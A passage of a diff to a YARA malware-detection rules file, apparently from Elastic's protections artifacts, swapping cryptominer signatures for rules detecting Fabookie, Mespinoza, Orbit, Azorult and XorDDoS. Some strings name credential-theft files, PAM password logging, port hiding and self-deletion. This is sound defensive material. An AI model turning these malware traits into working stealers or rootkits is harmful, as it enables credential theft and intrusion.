+ $s7 = "auto aaaaaaaastartTime:%d path %s" condition: - 3 of them + 4 of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_57C0C6D7 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Fabookie_024F8759 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Windows Trojan Fabookie (Windows.Trojan.Fabookie)" author = "Elastic Security" - id = "57c0c6d7-ded1-4a3e-9877-4003ab46d4a6" - date = "2021-01-12" - modified = "2021-09-16" + id = "024f8759-aaed-40fb-8052-35b58cf69f4e" + date = "2023-06-22" + modified = "2023-07-10" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "100dc1ede4c0832a729d77725784d9deb358b3a768dfaf7ff9e96535f5b5a361" - logic_hash = "d3a272d488cebe4f774c994001a14d825372a27f16267bc0339b7e3b22ada8db" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Fabookie.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6c6345c6f0a5beadc4616170c87ec8a577de185d53345581e1b00e72af24c13e" + logic_hash = "9477406b718c6489161cf4636be66c4f72df923b9c5a7ee4069ef6a9552de485" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b36ef33a052cdbda0db0048fc9da4ae4b4208c0fa944bc9322f029d4dfef35b8" + fingerprint = "0f5be9523a9a3f570e36ed8bbc9d113ffc8a40f868d5826e8b236d65f66e186b" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 78 01 66 0F EF C9 49 89 38 0F BE 00 83 E8 30 F2 0F 2A C8 48 } + $a1 = { 48 89 C2 4D 33 C0 4D 33 C9 C7 44 24 20 02 00 00 80 } + $a2 = { C7 C2 80 84 1E 00 41 C7 C0 00 10 00 00 41 C7 C1 04 00 00 00 48 8B 44 24 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_7E42Bf80 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Mespinoza_3Adb59F5 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Windows Ransomware Mespinoza (Windows.Ransomware.Mespinoza)" author = "Elastic Security" - id = "7e42bf80-60a4-4d45-bf07-b96a188c6e6b" - date = "2021-01-12" - modified = "2021-09-16" + id = "3adb59f5-a4af-48f2-8029-874a62b23651" + date = "2021-08-05" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "551b6e6617fa3f438ec1b3bd558b3cbc981141904cab261c0ac082a697e5b07d" - logic_hash = "ad8c8f0081d07f7e2a5400de6af2c6b311f77ff336d7576f7fb0bfe2593a9062" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Mespinoza.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6f3cd5f05ab4f404c78bab92f705c91d967b31a9b06017d910af312fa87ae3d6" + logic_hash = "28c8ad42a3af70fed274edc9105dae5cef13749d71510561a50428c822464934" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cf3b74ae6ff38b0131763fbcf65fa21fb6fd4462d2571b298c77a43184ac5415" - severity = 100 + fingerprint = "f44a79048427e79d339d3b0ccaeb85ba6731d5548256a2615f32970dcf67578f" + severity = 90 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0F 70 F8 FF 66 0F 73 FD 04 66 44 0F EF ED 66 41 0F 73 FE 04 66 41 0F } + $a1 = "Don't try to use backups because it were encrypted too." ascii fullword + $a2 = "Every byte on any types of your devices was encrypted." ascii fullword + $a3 = "n.pysa" wide fullword condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_271121Fb : FILE MEMORY +rule ELASTIC_Linux_Trojan_Orbit_57C23178 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Linux Trojan Orbit (Linux.Trojan.Orbit)" author = "Elastic Security" - id = "271121fb-47cf-47a7-9e90-8565d4694c9e" - date = "2021-01-12" - modified = "2021-09-16" + id = "57c23178-1345-47b7-97b1-aa2075d9d69d" + date = "2022-07-20" + modified = "2022-08-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "19aeafb63430b5ac98e93dfd6469c20b9c1145e6b5b86202553bd7bd9e118842" - logic_hash = "f43b1527ad4bbd07023126def89c1af47698cc832f71f4a1381ed0d621d79ed5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Orbit.yar#L1-L40" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "40b5127c8cf9d6bec4dbeb61ba766a95c7b2d0cafafcb82ede5a3a679a3e3020" + logic_hash = "25b29e874ea9d400662418ddbb1c995a5a5b49f8ba6f51f59f7aa57cdda74054" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "e0968731b0e006f3db92762822e4a3509d800e8f270b1c38303814fd672377a2" + fingerprint = "0bb1c74f872ea8778a442aafc2c6f3f04e331b7f743ba726257e36b09ef33da4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70391,55 +70669,81 @@ rule ELASTIC_Linux_Cryptominer_Xmrig_271121Fb : FILE MEMORY os = "linux" strings: - $a = { 18 41 C1 E4 10 C1 E1 08 41 C1 EA 10 44 89 CB 41 C1 E9 18 C1 } + $loaderstrings0 = "shred" + $loaderstrings1 = "newpath" fullword + $loaderstrings2 = "shm update" fullword + $loaderstrings3 = "cp -p %s /dev/shm/ldx/.backup_ld.so" fullword + $loaderstrings4 = "/dev/shm/ldx/libdl.so\n" fullword + $loaderstrings5 = "oldpath: %s newpath: %s\n" fullword + $loaderstrings6 = "can't locate oldpath" fullword + $loaderstrings7 = "specify dir" fullword + $loaderstrings8 = "/sshpass.txt" + $loaderstrings9 = "/sshpass2.txt" + $loaderstrings10 = "/.logpam" + $loaderstrings11 = "/.boot.sh" + $tmppath = "/tmp/.orbit" fullword + $functionName0 = "tcp_port_hidden" fullword + $functionName1 = "clean_ports" fullword + $functionName2 = "remove_port" fullword + $execvStrings0 = "[%s] [%s] [BLOCKED] %s " fullword + $execvStrings1 = "[%s] [%s] %s " fullword + $execvStrings2 = "%m-%d %H:%M:%S" fullword + $pam_log_password = { 8B 45 F8 48 98 C6 84 05 F0 FE FF FF 00 48 8D 85 F0 FE FF FF B9 A4 01 00 00 BA 42 04 00 00 48 89 C6 BF 02 00 00 00 B8 00 00 00 00 E8 B6 C2 FE FF 89 45 F4 48 8B 8D E0 FE FF FF 48 8B 95 E8 FE FF FF 48 8D 85 F0 FE FF FF } + $load_hidden_ports = { 48 8B 45 ?? BE 0A 00 00 00 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? 00 75 } + $hosts_access = { 8B 45 ?? 48 98 C6 84 05 D0 EF FF FF 00 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? 00 00 48 8B 95 C8 EF FF FF 48 89 D7 FF D0 89 45 ?? 48 8D 85 D0 EF FF FF 48 89 45 ?? EB } condition: - all of them + 7 of ($loaderstrings*) or ( all of ($functionName*) and $tmppath and all of ($execvStrings*)) or 2 of ($pam_log_password,$load_hidden_ports,$hosts_access) } -rule ELASTIC_Linux_Cryptominer_Xmrig_E7E64Fb7 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Azorult_38Fce9Ea : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Windows Trojan Azorult (Windows.Trojan.Azorult)" author = "Elastic Security" - id = "e7e64fb7-e07c-4184-86bd-db491a2a11e0" - date = "2021-01-12" - modified = "2021-09-16" + id = "38fce9ea-a94e-49d3-8eef-96fe06ad27f8" + date = "2021-08-05" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L61-L78" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e325ac02c51526c5a36bdd6c2bcb3bee51f1214d78eff8048c8a1ae88334a9e8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Azorult.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491" + logic_hash = "e23b21992b7ff577d4521c733929638522f4bf57b54c72e5e46196d028d6be26" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "444240375f4b9c6948907c7e338764ac8221e5fcbbc2684bbd0a1102fef45e06" + fingerprint = "0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 03 48 89 74 24 48 77 05 48 8B 5C C4 30 4C 8B 0A 48 8B 0F 48 8B } + $a1 = "/c %WINDIR%\\system32\\timeout.exe 3 & del \"" wide fullword + $a2 = "%APPDATA%\\.purple\\accounts.xml" wide fullword + $a3 = "%TEMP%\\curbuf.dat" wide fullword + $a4 = "PasswordsList.txt" ascii fullword + $a5 = "Software\\Valve\\Steam" wide fullword condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_79B42B21 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_2Aef46A6 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "79b42b21-1408-4837-8f1f-6de30d7f5777" + id = "2aef46a6-6daf-4f02-b1b4-e512cea12e53" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L80-L97" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "db42871193960ea4c2cbe5f5040cbc1097d57d9e4dc291bcc77ed72b588311ab" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "d2c88774eb5227cf2d133644c648ebe5ba40c7e0acb2b432bc6a1a9da10bfb3f" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "4cd0481edd1263accdac3ff941df4e31ef748bded0fba5fe55a9cffa8a37b372" + fingerprint = "e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70447,28 +70751,28 @@ rule ELASTIC_Linux_Cryptominer_Xmrig_79B42B21 : FILE MEMORY os = "linux" strings: - $a = { FC 00 79 0A 8B 45 B8 83 E0 04 85 C0 75 38 8B 45 EC 83 C0 01 } + $a = { 25 64 2D 2D 25 73 5F 25 64 3A 25 73 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_77Fbc695 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_A6572D63 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "77fbc695-6fe3-4e30-bb2f-f64379ec4efd" + id = "a6572d63-f9f3-4dfb-87e6-3b0bafd68a79" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L99-L117" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e723a2b976adddb01abb1101f2d3407b783067bec042a135b21b14d63bc18a68" - logic_hash = "af8e09cd5d6b7532af0c06273aa465cf6c40ad6c919a679fd09191a1c2a302f5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L20-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e" + logic_hash = "237392fe51c8528cb5ed446facfcd3535b8e1d594d77a542361873bd52426fa7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e0c6cb7a05c622aa40dfe2167099c496b714a3db4e9b92001bbe6928c3774c85" + fingerprint = "fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70476,28 +70780,27 @@ rule ELASTIC_Linux_Cryptominer_Xmrig_77Fbc695 : FILE MEMORY os = "linux" strings: - $a = { F2 0F 58 44 24 08 F2 0F 11 44 24 08 8B 7B 08 41 8D 76 01 49 83 } + $a = { C8 0F B6 46 04 0F B6 56 05 C1 E0 08 09 D0 89 45 CC 0F B6 46 06 0F B6 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_403B0A12 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_E41143E1 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "403b0a12-8475-4e28-960b-ef33eabf0fcf" + id = "e41143e1-52d9-45c7-b19f-a5475b18a510" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L119-L137" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "54d806b3060404ccde80d9f3153eebe8fdda49b6e8cdba197df0659c6724a52d" - logic_hash = "5b7662124eb980b11f88a50665292e7a405595f7ad85c5c448dd087ea096689a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L40-L57" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "4564bf2019ff5086071ff147c9cf1e16b8627ce5d70cbe8370aecbd518d94b57" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "785ac520b9f2fd9c6b49d8a485118eee7707f0fa0400b3db99eb7dfb1e14e350" + fingerprint = "f621a2e8c289772990093762f371bb6d5736085695881e728a0d2c013c2ad1d4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70505,27 +70808,28 @@ rule ELASTIC_Linux_Cryptominer_Xmrig_403B0A12 : FILE MEMORY os = "linux" strings: - $a = { 00 28 03 1C C3 0C 00 C0 00 60 83 1C A7 71 00 00 00 68 83 5C D7 } + $a = { 73 1E 80 3C 06 00 8D 14 30 8D 4C 37 FF 74 0D EB 36 0F B6 42 01 83 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_Bffa106B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_0Eb147Ca : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "bffa106b-0a9a-4433-b9ac-ae41a020e7e0" + id = "0eb147ca-ec6d-4a6d-b807-4de8c1eff875" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L139-L156" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "d7214ad9c4291205b50567d142d99b8a19a9cfa69d3cd0a644774c3a1adb6b49" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L59-L77" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b" + logic_hash = "b20479af0767e5e8579489b5298648b9cc84b3e0778f58d8dc9deb252d0f4806" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "665b5684c55c88e55bcdb8761305d6428c6a8e810043bf9df0ba567faea4c435" + fingerprint = "6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70533,28 +70837,27 @@ rule ELASTIC_Linux_Cryptominer_Xmrig_Bffa106B : FILE MEMORY os = "linux" strings: - $a = { 54 24 9C 44 0F B6 94 24 BC 00 00 00 89 5C 24 A0 46 8B 0C 8A 66 0F 6E 5C } + $a = { 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_73Faf972 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_884Cab60 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "73faf972-43e4-448d-bdfd-cda9be15fce6" - date = "2021-04-06" + id = "884cab60-214f-4879-aa51-c00de1a5ffc4" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L158-L176" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "00e29303b66cb39a8bc23fe91379c087376ea26baa21f6b7f7817289ba89f655" - logic_hash = "a6a9d304d215302bf399c90ed0dd77a681796254c51a2a20e4a316dba43b387f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L79-L96" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "139c5c1c3816047b595deb6a8873b2964e91393642b93536cd102af9a6033e7c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f31c2658acd6d13ae000426d3845bcec7a8a587bbaed75173baa84b2871b0b42" + fingerprint = "47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70562,28 +70865,28 @@ rule ELASTIC_Linux_Cryptominer_Xmrig_73Faf972 : FILE MEMORY os = "linux" strings: - $a = { 6F C4 83 E0 01 83 E1 06 09 C1 44 89 E8 01 C9 D3 } + $a = { E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_Af809Eea : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_Ba961Ed2 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "af809eea-fe42-4495-b7e5-c22b39102fcd" - date = "2021-04-06" + id = "ba961ed2-b410-4da5-8452-a03cf5f59808" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L178-L196" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "00e29303b66cb39a8bc23fe91379c087376ea26baa21f6b7f7817289ba89f655" - logic_hash = "4ae4b119a3eecfdb47a88fe5a89a4f79ae96eecf5d08eef08997357de7e6538a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L98-L116" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b" + logic_hash = "5b486c698c9c61dc126be5dbeea862b1f9bb5a6859c02a0fff125a9890147a6b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "373d2f57aede0b41296011d12b59ac006f6cf0e2bd95163f518e6e252459411b" + fingerprint = "fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70591,28 +70894,27 @@ rule ELASTIC_Linux_Cryptominer_Xmrig_Af809Eea : FILE MEMORY os = "linux" strings: - $a = { 83 E0 01 83 E1 06 09 C1 44 89 ?? 01 C9 D3 } + $a = { F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_9F6Ac00F : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_2084099A : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "9f6ac00f-1562-4be1-8b54-bf9a89672b0e" - date = "2021-04-06" + id = "2084099a-1df6-4481-9d13-3a5bd6a53817" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L198-L216" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9cd58c1759056c0c5bbd78248b9192c4f8c568ed89894aff3724fdb2be44ca43" - logic_hash = "9fa8e7be5c35c9a649c42613d0d5d5cecff3d9c3e9a572e4be1ca661876748a5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L118-L135" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "6674be1438ec290550c9586afda335755279a4aedadde455ffc0b41d1a0e634d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "77b171a3099327a5edb59b8f1b17fb3f415ab7fd15beabcd3b53916cde206568" + fingerprint = "dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70620,28 +70922,28 @@ rule ELASTIC_Linux_Cryptominer_Xmrig_9F6Ac00F : FILE MEMORY os = "linux" strings: - $a = { B8 31 75 00 00 83 E3 06 09 D9 01 C9 D3 F8 89 C1 } + $a = { 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Xmrig_Dbcc9D87 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_61C88137 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "dbcc9d87-5064-446d-9581-b14cf183ec3f" - date = "2021-12-13" - modified = "2022-01-26" + id = "61c88137-02f6-4339-b8fc-04c72a5023aa" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xmrig.yar#L218-L236" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "da9b8fb5c26e81fb3aed3b0bc95d855339fced303aae2af281daf0f1a873e585" - logic_hash = "b7fa60e32cb53484d8b76b13066eda1f2275ee2660ac2dc02b0078b921998e79" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L137-L155" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "479ef38fa00bb13a3aa8448aa4a4434613c6729975e193eec29fc5047f339111" + logic_hash = "e999355606ee7389be160ce3e96c6a62d7f9132b95cfec7d9f8b1a670551e6b8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ebb6d184d7470437aace81d55ada5083e55c0de67e566b052245665aeda96d69" + fingerprint = "c09b31424a54e485fe5f89b4ab0a008df6e563a75191f19de12113890a4faa39" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70649,62 +70951,57 @@ rule ELASTIC_Linux_Cryptominer_Xmrig_Dbcc9D87 : FILE MEMORY os = "linux" strings: - $a = { 78 72 47 47 58 34 53 58 5F 34 74 43 41 66 30 5A 57 73 00 64 48 8B 0C 25 F8 FF } + $a = { 24 8B C1 8B 0C 24 8D 64 24 FC 89 0C 24 8B 4D E8 87 0C 24 96 8D 64 } condition: all of them } -rule ELASTIC_Windows_Wiper_Hermeticwiper_7206A969 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_Debb98A1 : FILE MEMORY { meta: - description = "Detects Windows Wiper Hermeticwiper (Windows.Wiper.HermeticWiper)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "7206a969-bbd6-4c2d-a19d-380b71a4ab08" - date = "2022-02-24" - modified = "2022-02-24" - reference = "https://www.elastic.co/security-labs/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Wiper_HermeticWiper.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591" - logic_hash = "84c61b8223a6ebf1ccfa4fdccee3c9091abca4553e55ac6c2492cff5503b4774" + id = "debb98a1-c861-4458-8bff-fae4f00a17dc" + date = "2022-09-12" + modified = "2022-10-18" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = 